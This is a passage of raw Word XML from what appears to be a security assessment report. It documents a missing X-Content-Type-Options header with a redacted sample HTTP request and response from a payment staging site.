              <w:t>Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="5007C213" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="4DED8079" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13CDD8DC" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="003305F7" w:rsidP="003305F7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below HTTP request and response </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>demonstrates</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> that the application is not setting the </w:t>
            </w:r>
            <w:r w:rsidR="000E3A0E">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">X-Content-Type-Options </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>eader</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B05365A" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="003305F7" w:rsidRPr="00DB64A3" w14:paraId="5194EE56" w14:textId="77777777" w:rsidTr="003305F7">
              <w:trPr>
                <w:trHeight w:val="1915"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="72031101" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>GET /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>sgofundhip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/index.html</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7AB04C4B" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="586BE00A" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3D7ED725" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept: text/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>html,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xhtml+xml,application</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>xml;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.9,*/*;q=0.8</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4610756A" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Language: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>en-US,en;q</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>=0.5</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="00754E96" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Accept-Encoding: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gzip</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>, deflate</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2F547343" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Referer</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: https://payment.sit2.va.anthem.com/gofundhip/</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="55D68F9B" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Cookie: </w:t>
                  </w:r>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2350107A" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="59884729" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DB64A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Response:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="003305F7" w:rsidRPr="00DB64A3" w14:paraId="2357553B" w14:textId="77777777" w:rsidTr="003305F7">
              <w:trPr>
                <w:trHeight w:val="2129"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="5C1EDBA4" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>HTTP/1.1 200 OK</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="26DD0410" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Date: Fri, 31 May 2019 17:43:49 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="07F1995B" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Last-Modified: Wed, 22 May 2019 13:37:09 GMT</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5A94ECBB" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>ETag</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: "18550-3f4-5897a0fe16b40"</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1E4AB660" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Accept-Ranges: bytes</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="33433EB1" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Length: 1012</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="35C8E085" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Content-Type: text/html</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="765A2E72" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Connection: close</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7CB4CD56" w14:textId="77777777" w:rsidR="003305F7" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>&lt;!DOCTYPE html&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="3F365B3F" w14:textId="77777777" w:rsidR="003305F7" w:rsidRPr="00DB64A3" w:rsidRDefault="003305F7" w:rsidP="003305F7">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00DB64A3">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="686D8E00" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:i/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B668012" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="164BEB6A" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1506E225" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
